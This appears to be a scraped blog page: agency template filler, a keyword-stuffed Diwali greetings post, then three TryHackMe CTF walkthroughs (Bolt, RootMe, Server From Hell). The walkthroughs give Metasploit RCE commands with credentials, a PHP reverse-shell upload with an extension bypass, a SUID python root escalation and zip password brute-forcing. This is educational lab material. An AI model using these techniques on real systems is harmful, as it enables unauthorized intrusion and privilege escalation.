-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • happy Diwali 2020


    Diwali, Deepavali or Dipavali is a four-five day-long (varying as per the Hindu Calendar) festival of lights, which is celebrated by Hindus, Jains, Sikhs and some Buddhists every autumn in the northern hemisphere (spring in southern hemisphere). diwali 2020 dates



    happy Diwali 2019






    Diwali, Deepavali or Dipavali is a four-five day-long (varying as per the Hindu Calendar) festival of lights, which is celebrated by Hindus, Jains, Sikhs and some Buddhists every autumn in the northern hemisphere (spring in southern hemisphere). One of the most popular festivals of Hinduism, Diwali symbolises the spiritual "victory of light over darkness, good over evil and knowledge over ignorance." Light is a metaphor for knowledge and consciousness. During the celebration, temples, homes, shops and office buildings are brightly illuminated. The preparations, and rituals, for the festival typically last five days, with the climax occurring on the third day coinciding with the darkest night of the Hindu lunisolar month Kartika. In the Gregorian calendar, the festival generally falls between mid-October and mid-November.




    In the lead-up to Diwali, celebrants will prepare by cleaning, renovating, and decorating their homes and workplaces. During the climax, revellers adorn themselves in their finest clothes, illuminate the interior and exterior of their homes with diyas (oil lamps or candles), offer puja (worship) to Lakshmi, the goddess of prosperity and wealth,[note 1] light fireworks, and partake in family feasts, where mithai (sweets) and gifts are shared. Diwali is also a major cultural event for the Hindu, Sikh, Jain, and Buddhist diaspora from the Indian subcontinent.wishing script download






    Diwali is celebrated by Hindus, Jains, Sikhs, and Newar Buddhists, although for each faith it marks different historical events and stories, but nonetheless the festival represents the same symbolic victory of light over darkness, knowledge over ignorance, and good over evil. wishing website script free download



    Hinduism

    Diwali is celebrated in the honour of Lakshmi, the goddess of wealth.
    The religious significance of Diwali varies regionally within India. The festival is associated with a diversity of deities, traditions, and symbolism.These variations, states Constance Jones, may reflect diverse local autumn harvest festivals that fused into one pan-Hindu festival with a shared spiritual significance and ritual grammar while retaining local traditions.




    happy Diwali 2019


    One tradition links the festival to legends in the Hindu epic Ramayana, where Diwali is the day Vishnu's avatar Rama, Lakshmi's avatar Sita, Shesha's avatar Lakshmana, and Shiva's avatar Hanuman reached Ayodhya after a 14 year period in exile and Rama's army of good defeated the demon king Ravana's army of evil in the Treta Yuga.




    As per another popular tradition, in the Dwapara Yuga Period, Lord Vishnu as incarnation of Krishna killed the Demon Narakasura, who was evil king of Pragjyotishapura, near present-day Assam and released 16000 girls captivated by Narakasura. Diwali was celebrated as a significance of triumph of good over evil after Lord Krishna's Victory over Narakasura. The day before Diwali is remembered as Naraka Chaturdasi, the day on which Narakasura was killed by Lord Krishna.



    Many Hindus associate the festival with Lakshmi, the goddess of wealth and prosperity, and wife of Vishnu. According to Pintchman, the start of the 5-day Diwali festival is stated in some popular contemporary sources as the day Goddess Lakshmi was born from Samudra manthan, the churning of the cosmic ocean of milk by the Devas (gods) and the Asuras (demons) – a Vedic legend that is also found in several Puranas such as the Padma Purana, while the night of Diwali is when Lakshmi chose and wed Vishnu. Along with Lakshmi, who is representative of Vaishnavism, Ganesha, the elephant-headed son of Parvati and Shiva of Shaivism tradition, is remembered as one who symbolises ethical beginnings and the remover of obstacles.

    wishing website script for blogger

    Hindus of eastern India associate the festival with the goddess Durga, or her fierce avatar Kali (Shaktism), who symbolises the victory of good over evil. Hindus from the Braj region in northern India, parts of Assam, as well as southern Tamil and Telugu communities view Diwali as the day the god Krishna overcame and destroyed the evil demon king Narakasura, in yet another symbolic victory of knowledge and good over ignorance and evil. diwali 2020 kalnirnay




    diwali 2019 holidays



    History of Diwali

    The history of Diwali can be traced back to ancient India. There are various legends about the origin of this festival. Some believe it to be the celebration of the marriage of Lakshmi, the goddess of wealth, with Lord Vishnu. Others believe it to be the birthday of Lakshmi. The most widespread belief is that Diwali celebrates the return of Lord Rama along with Goddess Sita and Lakshman from his 14-year-long exile to the kingdom of Ayodhya. To display the joy of the return of their king, the people of Ayodhya illuminated the entire kingdom with earthen diyas, which gave birth to the festival of lights.  diwali 2020 date in india calendar










    Dhanteras

    Dhanteras starts off the Diwali celebrations with the lighting of Diya lamp rows, house cleaning and floor rangoli
    Dhanteras, derived from Dhan meaning wealth and teras meaning thirteenth, marks the thirteenth day of the dark fortnight of Kartik and the beginning of Diwali.[104] On this day, many Hindus clean their homes and business premises. They install diyas, small earthen oil-filled lamps that they light up for the next five days, near Lakshmi and Ganesha iconography.[104][96] Women and children decorate doorways within homes and offices with rangoli, colourful designs made from rice flour, flower petals and coloured sand,[102] while the boys and men decorate the roofs and walls of family homes, markets, and temples. The day also marks a major shopping day to purchase new utensils, home equipment, jewellery, firecrackers, and other items.On the evening of Dhanteras, families offer prayers (puja) to Lakshmi and Ganesha, and lay offerings of puffed rice, candy toys, rice cakes and batashas (hollow sugar cakes).







    According to Tracy Pintchman, Dhanteras is a symbol of annual renewal, cleansing and an auspicious beginning for the next year.[104] The term "Dhan" for this day also alludes to the Ayurvedic icon Dhanvantari, the god of health and healing, who is believed to have emerged from the "churning of cosmic ocean" on the same day as Lakshmi.[104] Some communities, particularly those active in Ayurvedic and health-related professions, pray or perform havan rituals to Dhanvantari on Dhanteras.









    Diwali in Various Religions

    Diwali is one of those Indian festivals that unify different religions, regions and cultures. The festival finds significance in Jainism, Sikhism and Buddhism along with Hinduism. Hindus celebrate Diwali as the homecoming of Lord Rama to his hometown Ayodhya after defeating the Ravana, the Rakshasa King of Lanka after serving a 14 years exile in the forests. Jains celebrate the festival as the day when Mahavira, their last Tirthankara on earth, attained Nirvana or enlightenment. The Buddhists celebrate Diwali as the day when Emperor Ashoka converted himself to Buddhism. The Sikhs celebrate the festival to remember the homecoming of their Guru Har Gobind Ji from the prison of Emperor Jahangir along with numerous Hindu gurus. diwali 2020 in delhi






    The Significance of 5 Days of Diwali

    5 days of Diwali serve different occasions according to Hindu mythology. The first day of Diwali is Dhanteras which indicates the beginning of the new financial year for Hindus. The second day of Diwali is Chhoti Diwali which is celebrated to remember the victory of Lord Krishna over the devil king Naraka. The third day is the main Diwali day which involves worshipping Goddess Lakshmi to rejoice her birth from Samudra Manthan. The fourth day of Diwali is known as Govardhan Puja which is celebrated to venerate the triumph of Lord Vishnu over the demon king Bali as well as the victory of Lord Krishna over God Indra. The fifth and final day of Diwali is known as Bhai Dooj which celebrates the love and bond of brothers and sisters.


    Diwali Rituals: How is Diwali Celebrated in India?


    Home Decorations: Diwali celebrations start with decorating the home. People often get their houses deep-cleaned in order to make it more aesthetic and pleasing. Decorations include lights, diyas and flowers. These symbolise lightness and success as they light-up the entire atmosphere and lift your spirits. A major part of this celebration is Rangoli making which are paintings made with colour at the entrance and courtyards of houses in order to welcome Goddess Laxmi.

    Fireworks: Bursting crackers on Diwali has been one of the key rituals of this festival since forever! Right from simple Phooljhadi to patatakas, to chaklis, you will find a range of crackers lighting up the sky. However, it is important to be aware of the environment, so make sure you do not burst too many!








    Laxmi Puja: This is one of the major rituals on Diwali when prayers are offered to Goddess Laxmi in lieu of a better year filled with wealth, peace and prosperity. This is done by lighting an oil lamp (diya) in front of the idol followed by prayers (aarti) that include hymns and chants dedicated to Lord Laxmi. Along with this, people clean the idol with gangajal or milk and water, apply haldi and kumkum, and offer flowers sweets and coconut to the goddess in order to receive her blessings.

    Shopping and Gifts: Perhaps the most exciting part of Diwali is Dhanteras, when people go shopping for their relatives and friends. Gifting one’s relatives is a huge tradition in India, especially on Diwali when families exchange presents as a way of wishing each other a year full of happiness and success.








    Feasts: Feasts are always an essential part of any Hindu festival. Having said that, it definitely is a major ritual on Diwali. Families often share sweets such as jalebis, laddus, Gujia, Kaju-kathli, kheer, halwas and barfis. Along with that, savoury snacks, cauliflower pakora or fritters, paneer makhani, samosa, puri and idli are served.diwali 2020 holidays








    Best Places to Experience Diwali Celebrations in India


    The 5 days of Diwali also account for a long holiday period. This year, Diwali falls on a Thursday, making it an extended weekend. The occasion offers you an opportunity to witness Diwali celebrations in a different city in India. Although, the festival of lights is celebrated with great exuberance across the country, there are few places which are especially famous for their grand Diwali celebrations.
    Varanasi







    In Varanasi, Diwali is an elaborate affair. A special Ganga Aarti takes place in the evening. The river is lit up with thousands of diyas floating over its surface. The environment is filled with the chants of the priests, singing prayers for Goddess Ganga and Lakshmi. The fireworks rarely stop and the Ghats reflect the beauty of a surreal world. It is a sight to behold, and one of the best Diwali experiences in India. how to make wishing script






    Festival Diwali wishing script 

    festival diwali wishing script  
    Diwali is one of the most significant festivals in India. It is celebrated across the length and breadth of the nation with much fanfare and enthusiasm. Known as the "Festival of Lights", Diwali is a 5-day celebration, wherein friends and families get together, light 'Diyas' or earthen lamps in their houses, feast on sweet delicacies, exchange gifts, play games and burn crackers. The festival is celebrated on 'Amavasya' or no moon night and heralds the dawn of a New Year, according to the Hindu calendar. It is a harbinger of new beginnings as it is believed that Goddess Lakshmi pays a visit to the houses of devotees in the middle of the dark night, and blesses them with wealth and happiness. It is called the festival of lights because it symbolizes the victory of light over darkness, good over evil and hope over despair.





    What is Festival Wishing Script?

    whatsapp viral script for blogger
    Festival Wishing Script or you can call it Event Blogging provides you a platform to make wishes to your relatives, friends and other people. You can make wishes about the latest upcoming festival by sending them these scripts through Social Media platform. Maybe you have got these types of wishes through Whatsapp. Because whatsapp is the best platform to make these scripts Viral. durga puja 2020 kolkata





    Need of these Script

    diwali 2020 agomon So the question comes out that why the wishing Script is so important and why we need these scripts. There are lots of factors which makes these script very useful for the blogger. Also these script are well decorated and well organised so you can make the Festival special for everyone. If you are a Blogger then it help you in these fields : wishing script download
    wishing script for blogger


    • Earning Source – These types of script can work as a earning source for your blog or website. You can place ads in these script and can get money form it. 
    • Increase in Traffic – You can also get thousand of traffic by these viral script in one day. So it can help to get a huge amount of traffic to your websites.
    • Can apply on Free Blog – There is no need of paid website or blog for these script. You can apply these scripts on a free blog. You can make the use of Blogger, WordPress etc. diwali  2020 delhi













    Diwali Wishing Messages




    Diwali Wishes in Hindi | दिवाली शुभकामना संदेश | Deepavali Wishes in Hindi

    *****

    || ॐ गणेशाय नमः ||
    लक्ष्मीजी और गणेशजी की कृपा से आपको कामयाबी, सुख, शान्ति और समृद्धि प्रदान हो।
    शुभ दीपावली

    *****
    दीवाली है रौशनी का त्यौहार
    लाये हर चेहरे पर मुस्कान
    सुख और समृधि की बहार
    समेट लो सारी खुशियाँ
    अपनों का साथ और प्यार
    इस पावन अवसर पर
    आप सभी को दीवाली का प्यार
    शुभ दीवाली

    *****

    दिए की रोशनी से सब अँधेरे दूर हो जाए
    दुआ है की चाहो वो ख़ुशी मंजूर हो जाए
    शुभ दीवाली



    *****

    दीपों का ये पावन त्यौहार
    आपके लिए लाये ख़ुशियाँ हज़ार
    लक्ष्मी जी विराजें आपके द्वार
    हमारी शुभकामनाएं करे स्वीकार
    शुभ दीपवाली

    Diwali Jokes In Hindi | Happy Diwali Jokes | दिवाली जोक्स



    *****

    दीप जगमगाते रहे
    सबके घर झिलमिलाते रहे
    साथ हो सब अपने
    सब यूँही मुस्कुराते रहे
    हैप्पी दीपावली



    *****

    दीपक की रौशनी
    मिठाइयों की मिठास
    पटाखों की बौछार
    धन-धान की बरसात
    हर दिन आपके लिए लाये
    दिवाली का त्यौहार
    दिवाली की हार्दिक बधाई

    Diwali Shayari | दिवाली शायरी


    *****

    दीप जलते जगमगाते रहे
    हम आपको आप हमें याद आते रहे
    जब तक ज़िन्दगी है
    दुआ है हमारी आप
    चाँद की तरह जगमगाते रहे
    शुभ दीपावली


    *****

    धन की वर्षा हो इतनी की
    हर जगह आपका नाम हो
    दिन रात आपको व्यापार में लाभ हो
    यही शुभकामना है हमारी
    ये दीवाली आपके लिये बहुत ख़ास हो
    दिवाली की शुभकामनाएं

    *****

    देवी महालक्ष्मी और गणेश जी की कृपा से
    आपके घर में हमेशा उमंग और आनंद की रौनक हो
    इस पावन मौके पर आप सब को
    दीपवाली की हार्दिक शुभकामनाएं


    *****

    पटाखों की आवाज़ से गूंज रहा संसार
    दीपक की रोशनी और अपनों का प्यार
    मुबारक हो आपको दीपावली का त्योंहार
    दिवाली की शुभकामनाएं








    Diwali Wishes SMS / Message Status in English

    Light a lamp of love!
    Blast a chain of sorrow!
    Shoot a rocket of prosperity!
    Fire a flowerpot of happiness!
    Wish u and your family..
    A VERY SPARKLING DIWALI
    May in this Diwali,
    you be blessed with
    Good fortune, Wealth, Prosperity, and Happiness.
    Wish you and your family
    a very Happy Diwali.
    A festival full of sweet childhood memories,
    sky full of fireworks,
    mouth full of sweets,
    house full of diyas and heart full of joy.
    Wishing you all a very Prosperous Diwali
    On Diwali,
    I wanted to send you wishes for
    A year filled with prosperity,
    Health and lots of fun!
    With gleam of Diya’s
    And the Echo of the Chants
    May Happiness
    and
    Contentment Fill Your life.
    Wishing you a very
    Happy and Prosperous Diwali
    Wishing You A Very Happy and Prosperous Diwali
    Sun glows for a day;
    Candle for an hour;
    Matchstick for a minute;
    But a wish glows forever.
    Here is my wish for a….
    Glowing Diwali and glowing life!
    Happy Diwali
    I Pray to God to
    Give U Shanti, Shakti, Sampati,
    Swarup, Saiyam, Saadgi, Safalta,
    Samridhi, Sanskar, Swaasth,
    Sanmaan, Saraswati, aur SNEH
    Shubh Diwali To All
    May the Divine Light of Diwali
    Spread into your
    Life Peace, Prosperity,
    Happiness and Good Health.
    It’s the “Festival of Lights” today
    It’s again the day of Diwali,
    It’s time to dress up folks,
    It’s time to adorn the thali.
    Happy Diwali Wishes To Friends
    The gorgeous festival of snacks and sweets
    Everyone enjoying a royal feast
    When old and young with delight meet
    And with love and affection do all hearts beat.
    Happy Diwali!!
    Open your doors to the footsteps of Lakshmi,
    Open your mind to the wisdom of Ganesha
    And open your inbox for the wishes from a friend.
    Sending you loads of hugs and goodwill.
    A very happy and memorable Diwali to you all!
    Happy Deepawali

    Deepawali Quotes in English

    Light a lamp of love!
    Blast a chain of sorrow!
    Shoot a rocket of prosperity!
    Fire a flowerpot of happiness!
    Wish you and your family
    Happy Diwali!!
    May your diwali be rangoli of lights brightening up
    your home with happiness and prosperity!
    May happiness and contentment fill your life.
    Wishing you a very happy and prosperous diwali!
    With a hope that you attain success and bliss
    With every light that is lit on the day of Diwali!
    A friend like u is a lightened Diya on a Diwali;
    repelling the shadows and spreading luster and glow all around!
    I m lessed enough 2 have a friend like u! celebrating
    Diwali with a friend like u is a double treat!
    Happy Diwali!
    May this festival of light dispel darkness,
    ignorance and evil from your life.
    may this holy occasion be a herald of unlimited joys
    and countless pleasures for u n ur family.
    May all the blessings surround u today and ever!
    Happy Diwali!
    As you celebrate this occasion full of lights:::,
    you are wished the brightest moments that Diwali can bring,
    lots of love and laughter to fill your days with cheer and a New year
    that is sure to bring you, the best of everything.
    !!!!!!! happy deewaaaliiiiii
    the dark shadows and burn firecrackers to sparkle up the night.
    on this Diwali, light up Diyas to drive away
    Sorrows will burst by crackers…
    Tension will release by music…
    Beauty will come out with bright diysas..
    Enjoy festivity at fullest…
    Have a Sparkling deewali…
    Happiness is just around the corner in the
    form of Diwali so enjoy your sparkling moments!!
    let rinse off all the differences and discrepancies
    on this diwali as it is the message of Diwali and
    let make a party with ur friends and family members to
    get pleasure from the feeling of Oneness.
    May the beauty of diwali fill your home with happiness.
    And may the coming year provide you with all that bring you joy!
    Happy Diwali!!
    On this dewaali I wish you to be diva for others
    that burn itself to enlighten the surroundings!!!!!
    Have a healthy wealthy deewali and a prosperous future ahead…
    The day of Diwali is a carnival of Good over Evil.
    It’s a day of celebrating valor, bravery and might too.
    And I wish u all the goodness, and success in everything u do.
    Have a joyous Diwali!
    The beautiful colors of rangooli,
    sounds of crackers…
    delicious sweets are inviting friends n families
    to celebrate deewali at its fullest.
    have a enjoyable deewali… 😀
    May you get the gift of wisdom,
    real wealth and knowledge this Diwali and always!
    Deewali is festival of happiness and positivity,,,
    share it with those who are waiting for you to remember them
    happy deewali!!
    Dhool bajao nacho or gaoo
    I ha deewali ladoo magwaoo
    Khud bhi khao or hamen bhi khilao
    Happy sweet deewali…
    Deewali ka tyohar laya ha pathakon ki bauchar
    Sath ma ha buht sara apnoon ka pyar
    Chor de larai ye ha khushiun ka tyohar
    Ab bas kar de oye mere yar;;;;;; happy deewalii

    Happy Diwali Wishes Status in Hindi


    पल पल सुनहरे फूल खिले,
    कभी ना हो कांटो का सामना,
    जिंदगी आपकी खुशियो से भरी रहे,
    दीपावली पर हमारी यही शुभकामना!!
    दीपावली की शुभ बेला में
    अपने मन का अन्धकार मिटायें
    मिठाइयां खाएं, पटाखे चलाएं
    और दीपों के इस त्यौहार को मनाएं
    शुभ दिवाली
    देवी महालक्ष्मी की क्रिपा से आपके घर में
    हमेशा उमंग और आनंद की रौनक हो
    इस पावन मौके पर आप सब को…
    दिवाली की हार्दिक शुभकामनाये !!”
    फ़लता कदम चूमती रहे,
    ख़ुशी आसपास घुमती रहे,
    यश इतना फैले की कस्तूरी शर्मा जाये
    और आप पर लक्ष्मी की कृपा इतनी हो की
    बालाजी भी देखते रह जाये!!
    ये दिवाली आपके जीवन में खुशियों की बरसात लाए,
    धन और शौहरत की बौछार करे,
    दिवाली की हार्दिक शुभकामनाएं!
    होगी रौशनी और सजेगे घर और बाजार
    मिल कर गले एक दूजे के बनायेगे खुशियों का त्यौहार,
    देखो आ रही है दिवाली
    हा जी आ रही है दिवाली हो जाओ तैयार..
    हैप्पी दिवाली इन एडवांस
    जगमग जगमग दीप जले,
    रोशन घर का हो हर कोना,
    प्रकाश के जैसे उज्जवल तन हो,
    जन जन स्वजन और निर्मल मनन हो
    रोशनी का आगाज़ जहां हो
    तुम वहां हो हम वहां हो,
    दूर तक ना अन्धकार हो,
    शुभकामनाये यही है हमारी
    सतरंगी हर दिवाली हो !
    सुख आये शांति आये आपके जीवन में,
    समृधि आये खुशियां आये आपके जीवन में,
    रहो आप हर परेशानी से दूर
    और इस दीवाली लक्ष्मी आये आपके जीवन में..
    !! शुभ दीवाली !!
    दीवाली है रौशनी का त्यौहार,
    लाये हर चेहरे पर मुस्कान,
    सुख और समृधि की बहार
    समेट लो सारी खुशियाँ,
    अपनों का साथ और प्यार
    इस पावन अवसर पर
    आप सभी को दीवाली का प्यार.











  • Bolt TryHackMe walkthrough Remote code execution

     


     


    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    Bolt TryHackMe walkthrough Remote code execution

    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts. TryHackMe walkthrough Remote code execution






     TryHackMe RootMe CTF walkthrough







    TryHackMe Room :- Click Here

     

    Summary


    •     Special port for User CMS
    •     Default Apache without special directories
    •     User and Password is on the webpage.
    •     Vulnerable to (RCE) Remote Code Execution
    •     Exploit with metasploit to get shell.
    •     Search for the flag.




    Reconnassiance


    As always start with the nmap:

    nmap -A -T4 -sV -sC -Pn -p- 10.10.93.121

     


     

     

    Check port 80 and 8000 with your machine IP :

     


     

    It’s default apache page ( 80 Port ) which nothing interesting.

    I decided to run Gobuster,Dirb & Rustbuster against it but no more benefit..let's use 8000 port with web...


    It redirects me to CMS site which has numerous of potential users, after looking around, I found the valid credentials.


    Username



    Password




    Based on the website, it shows many links that pointed out to the user, so I decided to browse 10.10.93.121:8000/bolt and it redirects to the login page.

    But I give you a tip to find the login page what the login page url is for a Bolt CMS

    Search on google ....

    Go to the login page at http://yourdomain.com/bolt Sign up with your: Username or email.

     

    LoL :-)




    After login, You will get the version of CMS and then search of this exploit




    Now if we have the version, first thing to do is to search on exploitdb or you can use searchsploit.

    Searchsploit is exploitdb database on your localhost.

     

    also you can search this exploit in Exploit-db https://www.exploit-db.com/exploits/48296

     

    So grab the path on the right side of the vulnerability. And run this command


    searchsploit cms bolt



    Found RCE


    I decided to search around with searchsploit and found this CMS has Authenticated RCE.

    open metasploit in terminal 


    msfconsole -q

    use exploit/unix/webapp/bolt_authenticated_rce

    show options

    set LHOST 10.8.61.234
    set RPORT 8000
    set RHOST 10.10.93.121
    set USERNAME bolt
    set PASSWORD boltadmin123

    exploit

     



    Searching for the flag!




    By executing find commands, I may easily get the flag.
       

    find / -type f -name "*.txt"

    If you are using TMUX, press prefix+/ & ctrl+s, then search for flag.txt.

    cat /home/flag.txt






     

     

    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-
  • TryHackMe RootMe CTF walkthrough

     

    TryHackMe RootMe CTF walkthrough

     

     


    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe RootMe CTF walkthrough

    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     TryHackMe RootMe CTF walkthrough







    TryHackMe Room :- Click Here

     

    RootMe CTF 

     

    First we start scanning with nmap and Enumerated the box as normal. You can answer all the questions in task 2 from our enumeration.

     

    • nmap -A -T4 -sV -sC -Pn -p- 10.10.162.244
    • nmap -A -vv -sV -sC  10.10.162.244

     

     


     

     

    Running gobuster to find out the hidden directories

     

    gobuster dir -u http://10.10.162.244 -w /usr/share/dirb/wordlists
     

     


     

    I then went into the /panel directory of the website and found an upload form. I then uploaded a simple php reverse shell, but with the extension of .phtml as the site would not let me upload a .php file.

     

     


     

     

    We can upload contents and the uploaded files can be accessed from /uploads. Using this we can upload a php reverse shell and get code execution on the box.

     

     

    Reverse shell


    Let us upload a file shell.php with following contents but .php extension is not allowed.

     


     

     

    But looks like there is some check in place which dont let us upload a php file.

    So I renamed it php-reverse-shell.php5 and uploaded the file again.

     

    Click Here to Download a php reverse shell file   after downloading don't forget to change a IP address and file extension with  .php5

     

    Like this :-

     


     

     

    Getting a reverse shell


    Listening on our box on port 1234

     


     

     

    Get a Proper Shell

    python -c "import pty;pty.spawn('/bin/bash')"  




     

     

     

     

    We were placed in the / directory so we needed to know where home was for www-data

     

    cd /etc/passwd

     


     

    So, we change into /var/www and see the user.txt flag

    cd /var/www

    ls -la

    cat user.txt

     

    cd /var/www
    ls -la
    total 20
    drwxr-xr-x  3 www-data www-data 4096 Aug  4 17:54 .
    drwxr-xr-x 14 root     root     4096 Aug  4 15:08 ..
    -rw-------  1 www-data www-data  129 Aug  4 17:54 .bash_history
    drwxr-xr-x  6 www-data www-data 4096 Aug  4 17:19 html
    -rw-r--r--  1 www-data www-data   21 Aug  4 17:30 user.txt
    cat user.txt
    THM{y0u_g0t_a_sh3ll}

     

    Now we need to figure out how to get the root.txt flag. Looking for the SUID binaries we see that our favorite scripting language has one set:


    find / -user root -perm -4000 2>/dev/null

    OR 

    find / -user root -perm /4000 

     

    find / -user root -perm -4000 2>/dev/null
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/snapd/snap-confine
    /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/policykit-1/polkit-agent-helper-1
    /usr/bin/traceroute6.iputils
    /usr/bin/newuidmap
    /usr/bin/newgidmap
    /usr/bin/chsh
    /usr/bin/python   <-----------------
    /usr/bin/chfn
    /usr/bin/gpasswd
    /usr/bin/sudo
    /usr/bin/newgrp
    /usr/bin/passwd
    /usr/bin/pkexec
    /snap/core/8268/bin/mount
    /snap/core/8268/bin/ping
    /snap/core/8268/bin/ping6
    /snap/core/8268/bin/su
    /snap/core/8268/bin/umount
    /snap/core/8268/usr/bin/chfn
    /snap/core/8268/usr/bin/chsh
    /snap/core/8268/usr/bin/gpasswd
    /snap/core/8268/usr/bin/newgrp
    /snap/core/8268/usr/bin/passwd
    /snap/core/8268/usr/bin/sudo
    /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/8268/usr/lib/openssh/ssh-keysign
    /snap/core/8268/usr/lib/snapd/snap-confine
    /snap/core/8268/usr/sbin/pppd
    /snap/core/9665/bin/mount
    /snap/core/9665/bin/ping
    /snap/core/9665/bin/ping6
    /snap/core/9665/bin/su
    /snap/core/9665/bin/umount
    /snap/core/9665/usr/bin/chfn
    /snap/core/9665/usr/bin/chsh
    /snap/core/9665/usr/bin/gpasswd
    /snap/core/9665/usr/bin/newgrp
    /snap/core/9665/usr/bin/passwd
    /snap/core/9665/usr/bin/sudo
    /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /snap/core/9665/usr/lib/openssh/ssh-keysign
    /snap/core/9665/usr/lib/snapd/snap-confine
    /snap/core/9665/usr/sbin/pppd
    /bin/mount
    /bin/su
    /bin/fusermount
    /bin/ping
    /bin/umount


     

    GTFO

     

    Using GTFObins we see a way that we can access files that we normally wouldn't be able to due to permission restrictions.

     

    • python -c 'print(open("/root/root.txt").read())'  
    • /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'                                                                        

                                                                                                           
                                                     


     

     

    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-

     


  • The Server From Hell TryHackMe Walkthrough

     

    The Server From Hell TryHackMe Walkthrough




    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    tryhackme RP Crack The Hash 


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.






     The Server From Hell TryHackMe Walkthrough







    TryHackMe Room :- Click Here

     

    Looking at the description of the room it says about starting from 1337

     

    First we start scanning with nmap banner grabbing, nmap scan the IP we have 

     

    The Server From Hell TryHackMe Walkthrough

     

     

    • 111 (rpcbind), 1137 (probably telnet/trim?), 2049 (nfs), 3333(ssh)

     

    We can futher enumrate rpc and nfs -

     

     

    The Server From Hell TryHackMe Walkthrough

     

    To know which folder has the server available to mount we an ask it using-

    showmount -e IP

    sudo showmount -e  10.10.34.91    

     

    The Server From Hell TryHackMe Walkthrough

     

    • mkdir nfs
    • sudo mount -t nfs 10.10.34.91:/home/nfs nfs
    • cd nfs
    • ls
    • unzip backup.zip

     

    But it asks for a password, lets crack it

     

    The Server From Hell TryHackMe Walkthrough

     

     

    Fcrackzip


    Now lets use this to bruteforce archive’s password


    • sudo fcrackzip -u -D -p /home/hackerboy/Documents/rockyou.txt


     

    The Server From Hell TryHackMe Walkthrough

     

    But I can’t get to extract the files becasue read-only file system , so I used GUI to view what was in these files

     

    The Server From Hell TryHackMe Walkthrough


    open flag.txt file :- thm{h0p3_y0u_l1k3d_th3_f1r3w4ll}


    And I was able to grab the flag,hint and ssh private key.

    Now hint.txt says

    2500-4500


